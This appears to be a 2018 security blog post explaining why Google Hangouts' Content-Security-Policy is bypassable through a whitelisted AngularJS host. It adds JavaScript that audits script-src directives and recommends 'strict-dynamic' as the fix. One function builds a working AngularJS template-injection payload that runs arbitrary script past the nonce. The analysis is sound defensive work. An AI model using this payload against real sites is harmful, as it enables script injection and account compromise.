Useless CSP

Aug 28, 2018

Google Hangout

Google Hangout (the call URL below may no longer work; check the headers sent on a valid call yourself) whitelists https://www.gstatic.com in script-src. That host serves AngularJS scripts, which makes the policy comprehensively bypassable: a script tag injected with a src on a whitelisted host needs no nonce, and AngularJS turns any injected template expression into script execution, so the nonce in the policy buys nothing.

$ curl -s -i 'https://hangouts.google.com/call/' -b 'yourcookie=yourvalue' | grep -Ei '^Content-Security-Policy:' | sed "s/;/;\\n/g"
script-src 'nonce-49VcM8sdA5vMEYgv3vjKXF5t9Rk' 'self' 'unsafe-eval' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com;
report-uri /_/elUi/cspreport;
$
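The following is an added example, not code from the original post: a small audit of a script-src directive that explains why the nonce above is ineffective, plus a builder for the AngularJS injection such a whitelist enables. The set of AngularJS-hosting origins is an assumption seeded with the two gstatic.com hosts the post names (the post only states that www.gstatic.com hosts AngularJS); the exact path of an AngularJS bundle on that host is not given here and must be supplied by the tester.

```javascript
// Added example (not from the original post): audit a CSP script-src whitelist
// for hosts that make a nonce-based policy bypassable, and build the AngularJS
// gadget such a host enables. The sample header below is the one from the post.

// ASSUMPTION: origins believed to serve AngularJS bundles. The post names
// www.gstatic.com; ssl.gstatic.com is included on the same assumption.
const ANGULAR_HOSTS = new Set(["www.gstatic.com", "ssl.gstatic.com"]);

// Parse a CSP header value into { directiveName: [sourceExpressions] }.
// Per the spec a repeated directive is ignored, so the first wins.
function parseCsp(header) {
  const policy = {};
  for (const raw of header.split(";")) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!(key in policy)) policy[key] = sources;
  }
  return policy;
}

// Host part of a host-source such as https://www.gstatic.com, *.gstatic.com
// or www.google.com:443/path. Returns null for keyword, nonce, hash and
// scheme sources (those are handled separately).
function hostOf(source) {
  if (source.startsWith("'")) return null;
  const m = source.match(/^(?:[a-z][a-z0-9+.-]*:\/\/)?([^/:]+)(?::\d+|:\*)?(?:\/.*)?$/i);
  return m ? m[1].toLowerCase() : null;
}

// Audit script-src (falling back to default-src) and return findings that
// describe why a nonce alone does not make the policy effective.
function auditScriptSrc(header) {
  const policy = parseCsp(header);
  const sources = policy["script-src"] || policy["default-src"] || [];
  const findings = [];
  const hasNonce = sources.some((s) => /^'nonce-/.test(s));
  const hasHash = sources.some((s) => /^'sha(256|384|512)-/.test(s));
  const strictDynamic = sources.includes("'strict-dynamic'");

  if (sources.includes("'unsafe-inline'") && !hasNonce && !hasHash) {
    findings.push("'unsafe-inline' without nonce/hash: any injected inline script runs");
  }
  if (sources.includes("'unsafe-eval'")) {
    findings.push("'unsafe-eval': eval()/Function() reachable from any allowed script");
  }
  // With 'strict-dynamic' (CSP3) browsers ignore host and scheme sources, so
  // the whitelist cannot be abused; without it every entry is attack surface.
  if (!strictDynamic) {
    for (const s of sources) {
      if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) {
        findings.push(`scheme source ${s}: any ${s.slice(0, -1)} origin may serve scripts`);
        continue;
      }
      const host = hostOf(s);
      if (host === null) continue;
      if (host === "*") {
        findings.push("wildcard host: any origin may serve scripts");
      } else if (host.startsWith("*.")) {
        const suffix = host.slice(1);
        const covered = [...ANGULAR_HOSTS].filter((h) => h.endsWith(suffix));
        findings.push(`wildcard ${host}: all subdomains may serve scripts` +
          (covered.length ? ` (includes AngularJS host ${covered.join(", ")})` : ""));
      } else if (ANGULAR_HOSTS.has(host)) {
        findings.push(`${host} serves AngularJS: nonce bypassable via client-side template injection`);
      }
    }
  }
  return { hasNonce, strictDynamic, findings };
}

// The injection an attacker would place in an HTML context. `angularUrl` must
// point at an AngularJS bundle on a whitelisted host (not given here). The
// script tag needs no nonce because host sources still apply without
// 'strict-dynamic'. The {{ }} gadget uses the Function constructor, which
// needs 'unsafe-eval' (present in the post's header) and an AngularJS version
// without an expression sandbox (1.6+) or a sandbox escape for older ones.
function angularBypassPayload(angularUrl, js) {
  return `<script src="${angularUrl}"></script>` +
    `<div ng-app ng-csp>{{constructor.constructor('${js}')()}}</div>`;
}

// Sample input: the header captured in the post.
const HANGOUTS_CSP =
  "script-src 'nonce-49VcM8sdA5vMEYgv3vjKXF5t9Rk' 'self' 'unsafe-eval' " +
  "https://apis.google.com https://ssl.gstatic.com https://www.google.com " +
  "https://www.gstatic.com; report-uri /_/elUi/cspreport";

for (const f of auditScriptSrc(HANGOUTS_CSP).findings) console.log("- " + f);
```

Against the captured header the audit reports 'unsafe-eval' and both gstatic.com hosts; the same policy with 'strict-dynamic' in place of the host list produces no findings, which is the fix a nonce-based policy should get.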